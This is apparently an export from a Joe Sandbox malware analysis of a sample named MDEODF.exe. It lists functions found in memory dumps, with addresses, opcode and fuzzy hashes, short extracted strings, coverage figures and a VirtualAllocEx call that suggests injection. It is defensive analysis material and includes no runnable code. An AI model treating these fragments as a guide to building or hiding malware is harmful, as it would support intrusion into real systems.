Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c34d0ca8c0741635c76d828124b91ee9ace4a234469a6a5240a0f884d513c331
Instruction ID: 11f2417a09e78b49df27f3c7e4f8f13a4b2d47cf0488c42bdf36c113c2bc8d65
Opcode Fuzzy Hash: c34d0ca8c0741635c76d828124b91ee9ace4a234469a6a5240a0f884d513c331
Instruction Fuzzy Hash: FC42F4749001998FDB54DFADC984A9DFBF2BF88345F59C5AAD408AB212DB30D981CF90

Function 002E1B90 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7d4e689504fddef3d1706faaffe38847798a5e45745fa244d211804cd1ce66
Instruction ID: 3ddef0e47101dbac662001a03e81eaa7ba7a31adf287706fddb5108ee40d051f
Opcode Fuzzy Hash: 8e7d4e689504fddef3d1706faaffe38847798a5e45745fa244d211804cd1ce66
Instruction Fuzzy Hash: 7E429F74E11229CFDB64CFA9C984B9DBBB2BF48300F5481A9E809A7355D730AE81CF50

Function 002E50C9 Relevance: .5, Instructions: 512COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e45676498530183ebd17b93f249683cfedafb68b6c3b6e5929468e8c28ca24
Instruction ID: ae2e3e47f56ceb6f8cf4ed5314855320195ec1f6bc33de4ccc361b0feff401c0
Opcode Fuzzy Hash: c0e45676498530183ebd17b93f249683cfedafb68b6c3b6e5929468e8c28ca24
Instruction Fuzzy Hash: FD428074E11229CFDB64CFA9C984B9DBBB2BF48310F5181A9E809A7355D731AE81CF50

Function 002E82E2 Relevance: .5, Instructions: 512COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f9796d7c26994cc6e17332809ac48eb3409c2efe00ae7eadf19eb62d33a31e
Instruction ID: 12450b71159e96545922b473e51bddca03753d2ea94ab1231d7ea7ff4ec6bec1
Opcode Fuzzy Hash: e6f9796d7c26994cc6e17332809ac48eb3409c2efe00ae7eadf19eb62d33a31e
Instruction Fuzzy Hash: DF429274E15229CFDB54CFA9C984B9DBBB2BF48310F5481A9D809A7395DB30AE81CF50

Function 002E38E7 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a00253f70dede38acfafd2b416bc1606aa651916af90494659c411c49e0fcdc
Instruction ID: 2ba75652bb31746afc7fe2c6a7fb3a71820faab747d5fc1414ab6dbb999ae4e2
Opcode Fuzzy Hash: 0a00253f70dede38acfafd2b416bc1606aa651916af90494659c411c49e0fcdc
Instruction Fuzzy Hash: B512F4749002958FDB54DFADC988A8DFBF2BF88355F59C5AAD408AB212DB30D981CF50

Function 002EA42A Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8cc68e1b3b1d7928e756f26678b1243ad1ecdd6af9d175dd7f1215db4f8d5f9
Instruction ID: 21bf8022a4f73cbb952228c4c0cdb24bad399140a5d867d65b4e1d6ee10736a8
Opcode Fuzzy Hash: f8cc68e1b3b1d7928e756f26678b1243ad1ecdd6af9d175dd7f1215db4f8d5f9
Instruction Fuzzy Hash: BD619674E01208DFDB58DFAAD994ADDBBF2BF89300F249169E505AB365DB309941CF00

Function 002EC550 Relevance: 1.6, APIs: 1, Instructions: 104
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002EC602

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 13cb2eb02b6390d5589d2c1c13ab53002cad73fc62ab0b561787f2ed1871f109
Instruction ID: 58c87a05ac629e604ebc68bc5e0c791199ad26afa85e815f4fb6a44fbbd43471
Opcode Fuzzy Hash: 13cb2eb02b6390d5589d2c1c13ab53002cad73fc62ab0b561787f2ed1871f109
Instruction Fuzzy Hash: 3B31ABB9D002589FCF10CFA9D984AEEFBB1BB49310F20A42AE815B7350C735A946CF54

Function 002EC558 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002EC602

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 747b4096c88f580c6775333357478d3754ebf857f9eb59c6b5f1225c9eec2d00
Instruction ID: 5df4f5401b6ed9cf8916e3e8d46c75ed9205f36b9b31619d68b24a1bbcc0c417
Opcode Fuzzy Hash: 747b4096c88f580c6775333357478d3754ebf857f9eb59c6b5f1225c9eec2d00
Instruction Fuzzy Hash: 4E3189B5D002589FCF10CFA9D984AEEFBB5BB49310F20A42AE814B7310D735A955CF64

Non-executed Functions

Function 002EA120 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7747624101885d408bb4faf8fcd5f15fac2413051b962610a9eba1508ac640
Instruction ID: 4ade035f3e3825388a6e5e684662a50efa1c10ec0cfb219040199d525d94195e
Opcode Fuzzy Hash: ff7747624101885d408bb4faf8fcd5f15fac2413051b962610a9eba1508ac640
Instruction Fuzzy Hash: F6B1B574E002598FDB14DFAAC981AADFBF2BF88300F64C16AD419AB355DB34A941CF51

Function 002EA110 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31aa863f62a4cc8100632f71eeb4d7cd7c9d54eef304ac6d30a8ef2846111e7c
Instruction ID: 75962df9f5e976700244529875b67e696926f24813807a5b73f4e60435505dcf
Opcode Fuzzy Hash: 31aa863f62a4cc8100632f71eeb4d7cd7c9d54eef304ac6d30a8ef2846111e7c
Instruction Fuzzy Hash: D391C574E102598FDB58CFAAC984A9DBBF2BF88300F64C169D409AB355DB34AD42CF50

Analysis Process: MDEODF.exePID: 3812, Parent PID: 3772COMMON

Executed Functions

Function 002D0B60 Relevance: 2.0, Strings: 1, Instructions: 765COMMON

Download Yara Rule

Strings

dp, xrefs: 002D0E64

Memory Dump Source

Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd

Similarity

API ID:
String ID: dp
API String ID: 0-2261812057
Opcode ID: c320f6e425ef58df9f8290de2ade55fadc5e571fa6164fa59806221568ffc758
Instruction ID: fcf66e8242a606d0adb702e79d47b1f7af6b5b332dad8305f781fbd76721e677
Opcode Fuzzy Hash: c320f6e425ef58df9f8290de2ade55fadc5e571fa6164fa59806221568ffc758
Instruction Fuzzy Hash: 2E829074A10229DFCB24DFA8D984BDDBBB1BF49304F1085AAD409AB365D770AE85CF50

Function 002D0A49 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866c2abc0cf9d9d205240c9b1be84bd2908d7fd6b101995fda3e1aeb1acdcd85
Instruction ID: 6b34def7cc336d5a528b97bde41d00ef968a0db99287d9607b918c345be855ff
Opcode Fuzzy Hash: 866c2abc0cf9d9d205240c9b1be84bd2908d7fd6b101995fda3e1aeb1acdcd85
Instruction Fuzzy Hash: 76213C71E0024E9FCF05DFA8D450ADDBBB1EF49310F8581A6D464BB661D730A94ACF94

Function 002D0839 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27076f47249d5a7b29c62198880757e7df81d27f29efee02ab1cf4183eda5eb1
Instruction ID: 3c732b02b3e8857f8fbcfb0a34ada3e82227add011807390b35597933d37b311
Opcode Fuzzy Hash: 27076f47249d5a7b29c62198880757e7df81d27f29efee02ab1cf4183eda5eb1
Instruction Fuzzy Hash: 01212F70A00349DFC742EFB8E985B4D7FF1EF45308F4049A5D044AF269DB74AA498B91

Function 002D0848 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f9e7cc8340aac551f67e28946531868748866c47b05930be1fd2166cce4fa6e
Instruction ID: 33b593b623517d66a05bdadc3de5ac4b27e30f8894ada7a6d51a7f29e227c7d2
Opcode Fuzzy Hash: 0f9e7cc8340aac551f67e28946531868748866c47b05930be1fd2166cce4fa6e
Instruction Fuzzy Hash: C6110D70E10309EFCB45EFB8E689B4D7FF1EB44308F508965D044AF669DB74AA498B81

Function 002D1870 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3146a1b190b7b3a5efde34a2da0b5317b78635eb2ae0136c05fc92d5530fc149
Instruction ID: b26d67d93aa17a99e01565cdd83bbc514fd98de81f180909cbe6f6a2ef8bc876
Opcode Fuzzy Hash: 3146a1b190b7b3a5efde34a2da0b5317b78635eb2ae0136c05fc92d5530fc149
Instruction Fuzzy Hash: D5F06970C182099BDF00CFA6D4543EEBBF4EB4A300F00506AD410B7240D7785929DF90

Function 002D09DF Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9d50e45b96420fcb86b016c73dcdb730e944ccc9d24c396c9021a367598da9
Instruction ID: 575d8b698d093b84a66280176d293eb775d07283fa3863f0a8d350963db42cb6
Opcode Fuzzy Hash: 3d9d50e45b96420fcb86b016c73dcdb730e944ccc9d24c396c9021a367598da9
Instruction Fuzzy Hash: 6001B670C05349DFCB05DFA8D894A9DBBB4FF46300F1445EAD455E72A5EB30AA54CB81

Function 002D09F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375310768.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be4d4671681b2eeb55ee69a1a34ef9b5a3e68427c79f9aa53e477a20f325104
Instruction ID: 47ab3d6c50d0fef02b9fd14323c8e23c849cc46e303c31fbbebcfd05f7dc94a0
Opcode Fuzzy Hash: 0be4d4671681b2eeb55ee69a1a34ef9b5a3e68427c79f9aa53e477a20f325104
Instruction Fuzzy Hash: 5CF0B274C0020EDFCB44EFA8D9856AEBBB4FB45300F1046AAC415A7360EB70AA84CB80

Analysis Process: MDEODF.exePID: 3820, Parent PID: 3772COMMON

Execution Graph

Execution Coverage:	21.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	17
Total number of Limit Nodes:	0

Executed Functions

Function 00300B60 Relevance: 5.8, Strings: 4, Instructions: 765
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dp, xrefs: 00300E64
@T', xrefs: 003013E0
@T', xrefs: 00301489
(e', xrefs: 00301359

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: (e'$@T'$@T'$dp
API String ID: 0-2762516323
Opcode ID: 71172a2d56ddbc8bc3e5e1def0abc33f4a3580858ee30d3fc6dbf69e833c110d
Instruction ID: 5f0160351a1b259e1d4467b1f8f91a8b6c6db84afb3ed2c5acacbd263f396e7c
Opcode Fuzzy Hash: 71172a2d56ddbc8bc3e5e1def0abc33f4a3580858ee30d3fc6dbf69e833c110d
Instruction Fuzzy Hash: 8F82B074901229CFCB25DFA8D894BDDBBB5BF49300F1085AAD409AB365DB30AE85CF54

Function 0030E208 Relevance: 2.9, Strings: 2, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@T', xrefs: 0030E4A5
@T', xrefs: 0030E41F

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: @T'$@T'
API String ID: 0-428772192
Opcode ID: 9686809002612c25f97e8de9ba4a186a916e6516471fbfbb4ed6beb068e06586
Instruction ID: 6143317123d3ae7f0408ae6f82b446362c4f8f2d82ca016ee777970c90e63e45
Opcode Fuzzy Hash: 9686809002612c25f97e8de9ba4a186a916e6516471fbfbb4ed6beb068e06586
Instruction Fuzzy Hash: C512B474E05219CFDB15DFA8C880ADDBBF6BF49310F2186A9D409AB366D730A985CF50

Function 0030E1C0 Relevance: 2.8, Strings: 2, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@T', xrefs: 0030E4A5
@T', xrefs: 0030E41F

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: @T'$@T'
API String ID: 0-428772192
Opcode ID: 3856e4b51a74cad8ac4202dd13f053179fd65d7921903828a11c0beaba2e79b9
Instruction ID: 04131f98f095c45c7063579dd767095375bfbc7bffdc97f01f90419a7cd63ec9
Opcode Fuzzy Hash: 3856e4b51a74cad8ac4202dd13f053179fd65d7921903828a11c0beaba2e79b9
Instruction Fuzzy Hash: 16F1D674E05218CFDB15CFA8C890ADDBBF6BF49310F258699D409AB3A6D730A985CF50

Function 0030E1F8 Relevance: 2.8, Strings: 2, Instructions: 321
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@T', xrefs: 0030E4A5
@T', xrefs: 0030E41F

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: @T'$@T'
API String ID: 0-428772192
Opcode ID: b6232c6508300a54e07bbd1604e98addfde64830b6a0c4212c6071a2f5adad6f
Instruction ID: af1a6cf83974fe6fd79a46a9dcf3caecdb44e5f78c2a74bdb5d62a4bcb3d08f3
Opcode Fuzzy Hash: b6232c6508300a54e07bbd1604e98addfde64830b6a0c4212c6071a2f5adad6f
Instruction Fuzzy Hash: 63E1C674E05218CFDB15CFA8C890ADDBBF6BF49310F258699D409AB3A6D730A985CF50

Function 00303258 Relevance: 1.9, Strings: 1, Instructions: 640COMMON

Download Yara Rule

Strings

XP', xrefs: 003032FB

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: XP'
API String ID: 0-2187284005
Opcode ID: f6b32ab0f11431e56cfb6efdc78920b19f22cd3851d830065f20d4f52cd5fd4a
Instruction ID: fd07918d2fa7465c4d22a7ea117d9697b10239af81fe5c39160cdf15d6821bbf
Opcode Fuzzy Hash: f6b32ab0f11431e56cfb6efdc78920b19f22cd3851d830065f20d4f52cd5fd4a
Instruction Fuzzy Hash: 5D629D74A01229CFCB25CF69C884BD9BBB5BF4A300F5082E9D449AB365D730AE85CF41

Function 00302030 Relevance: 1.6, Strings: 1, Instructions: 334COMMON

Download Yara Rule

Strings

(p, xrefs: 003020A5

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: 42b4184daa047c527d03abce8359ddace16cca44d91fcbfb3b2806f71326b74b
Instruction ID: 9f3060911d8481617f77529e3387c598d195f90276dc85b3d7ef7ee1322846c4
Opcode Fuzzy Hash: 42b4184daa047c527d03abce8359ddace16cca44d91fcbfb3b2806f71326b74b
Instruction Fuzzy Hash: 15E11674A01208CFDB19DFA8C594A9EBBF6FF89300F218569D405AB3A5DB30AD46CF50

Function 0030BF98 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d0188e45f359daa6bc5d399983de1ec1be4b00965b9ebbf7dffc1b9a36e07b
Instruction ID: 66b63b35afeac7dedd76e8fee6a986c66bd0f5fc8c6fc43ba3539bbb3bdffdcf
Opcode Fuzzy Hash: c8d0188e45f359daa6bc5d399983de1ec1be4b00965b9ebbf7dffc1b9a36e07b
Instruction Fuzzy Hash: D602F374D11219CFDB25CFA9C891B9DBBB1BB49300F1092AAD409B7290EB749E85CF54

Function 0030EBA8 Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 119dc1de6e3f91ee6eb96ee4bbfaa89ae0ad82b469e04b1d183c5c413bd45ed4
Instruction ID: 259ffc02203da515abcc6faf20c9a13fe30762c46690f94f8a958493a021aab0
Opcode Fuzzy Hash: 119dc1de6e3f91ee6eb96ee4bbfaa89ae0ad82b469e04b1d183c5c413bd45ed4
Instruction Fuzzy Hash: ED02D274E05219CFDB25CFA8C494ADDBBF1BF49310F6086A9D409AB3A6D730A985CF50

Function 0030CDC8 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a90477b68ed8f2e708478904f88daeb18e2479257c703dbd7031f500d4fcb3
Instruction ID: ae8e054d022addc25133530f6a73cbdc699af0d8d6faf0e1a6e993ab75573cc8
Opcode Fuzzy Hash: 26a90477b68ed8f2e708478904f88daeb18e2479257c703dbd7031f500d4fcb3
Instruction Fuzzy Hash: C5F1D374D01219CFDB25CFA8C995B9DBBF2BF49300F1081AAD409A7290EB749E85CF55

Function 0030F6D8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87afdefa2a336f9993c05ed29b811639c8267d4932b054584a71693b111dbbd
Instruction ID: 8c8ab83d1f20d23c4447c1066d93586da32efbe6de9e923527cd1dbeb62ff2f4
Opcode Fuzzy Hash: c87afdefa2a336f9993c05ed29b811639c8267d4932b054584a71693b111dbbd
Instruction Fuzzy Hash: 1302AF74E01219CFCB25CFAAC594ADDBBF5BF89300F248269D409AB766D730AA45CF50

Function 00307F90 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fc3359171338909795ecaeb4dd5427a0d81820e0001ec25877cb9f0d4aa869
Instruction ID: 29ea51cb21130e4ee2426fd99e8e2272334b3edf02891456333f5015446e474d
Opcode Fuzzy Hash: a4fc3359171338909795ecaeb4dd5427a0d81820e0001ec25877cb9f0d4aa869
Instruction Fuzzy Hash: F0D18174E013188FDB15DFA9C984A9DBBF2BF89300F658695D408AB355DB30AE85CF90

Function 00304458 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 931134e61fec664e3f0e6fe16117924a3a24bea96f9c50259f3b4ed1cddc37d3
Instruction ID: 4ac4d3decbc62b6246c549677be261223bfd54e96c06635db2b8de3c53e25b9f
Opcode Fuzzy Hash: 931134e61fec664e3f0e6fe16117924a3a24bea96f9c50259f3b4ed1cddc37d3
Instruction Fuzzy Hash: 12B18E75E00319CFCB05CFA9C594ADDBBF6BF89310F2591A9E409AB265D730AA85CF40

Function 00306371 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72563367ee88c18297b83ba9e46faa2890785d3d672a83ab7a1a84a41d996e80
Instruction ID: 59aa8a3ad9024268e58a0a405f489e1aa7e65d939e5ff0cbcf33ab20287fbac4
Opcode Fuzzy Hash: 72563367ee88c18297b83ba9e46faa2890785d3d672a83ab7a1a84a41d996e80
Instruction Fuzzy Hash: 88410475E012199FDB05DFAAC895AEEFBF6BF88300F14806AD404B7295DB345A46CB90

Function 0030DC00 Relevance: 4.1, Strings: 3, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@T', xrefs: 0030DD3C
@T', xrefs: 0030DDBD
(e', xrefs: 0030DCC0

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: (e'$@T'$@T'
API String ID: 0-2136524690
Opcode ID: e7af4575023be8e6c11388b1af60a5c34f9a7c849f79ce63ea0b6ad9b71ec150
Instruction ID: 0df870df9be11c58d73fc76c58754ef4ac11a975a9cb75c495a9353952b3483d
Opcode Fuzzy Hash: e7af4575023be8e6c11388b1af60a5c34f9a7c849f79ce63ea0b6ad9b71ec150
Instruction Fuzzy Hash: 87E1AE74A01319CFCB05CFA9C898ADDBBF6BF4A310F148569E409AB3A6D770A945CF50

Function 00305240 Relevance: 4.0, Strings: 3, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D@', xrefs: 003052EC
D@', xrefs: 003052D7
(p, xrefs: 003052C2

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: (p$D@'$D@'
API String ID: 0-2399180897
Opcode ID: 3cb517a18da229b1e7d5c65e3424b5ddf7a19a8752da9aa53d0062e0177766bc
Instruction ID: bd7894473519f66ea5ef3c61c0d0fff68ab4fa3827683ab3276b4a6b39ef84ac
Opcode Fuzzy Hash: 3cb517a18da229b1e7d5c65e3424b5ddf7a19a8752da9aa53d0062e0177766bc
Instruction Fuzzy Hash: 57D1C174A01259CFCB15CFA8C984A9DBBF2FF49310F1585A5E409AB36AD770AD89CF40

Function 0030120B Relevance: 4.0, Strings: 3, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@T', xrefs: 003013E0
@T', xrefs: 00301489
(e', xrefs: 00301359

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: (e'$@T'$@T'
API String ID: 0-2136524690
Opcode ID: d3bafc9a57412e5536efea01acc255000f29efedee7dc69233de2c0775846757
Instruction ID: 4403e65ba4441ac05729bb8ebad4bc988a1a3f7bac4fd7dece6c54d675b7ec91
Opcode Fuzzy Hash: d3bafc9a57412e5536efea01acc255000f29efedee7dc69233de2c0775846757
Instruction Fuzzy Hash: 97A1A2B4A00229CFCB25CF98D884BDDB7B5FF49304F5085A6D419AB265E730AE85CF54

Function 00306F20 Relevance: 3.8, Strings: 3, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(p, xrefs: 00306F8D
M>, xrefs: 00306F45
(p, xrefs: 00306F61

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: (p$(p$M>
API String ID: 0-3726686641
Opcode ID: 0e762851bc852e08bd29ca350343c819ed63230b2e218f057bd338dab4d2a5b9
Instruction ID: 05946ec19030b7cc319b0036f46aa7bd551b5e3aef295cfbbc6205d156cea1cb
Opcode Fuzzy Hash: 0e762851bc852e08bd29ca350343c819ed63230b2e218f057bd338dab4d2a5b9
Instruction Fuzzy Hash: 5C3106317043505FC316DB2DE824A1EBFEADFC9360319856AE809CB39ADE34DC068795

Function 00302C25 Relevance: 2.6, Strings: 2, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|}', xrefs: 00302CE9
|}', xrefs: 00302D79

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: |}'$|}'
API String ID: 0-1071223719
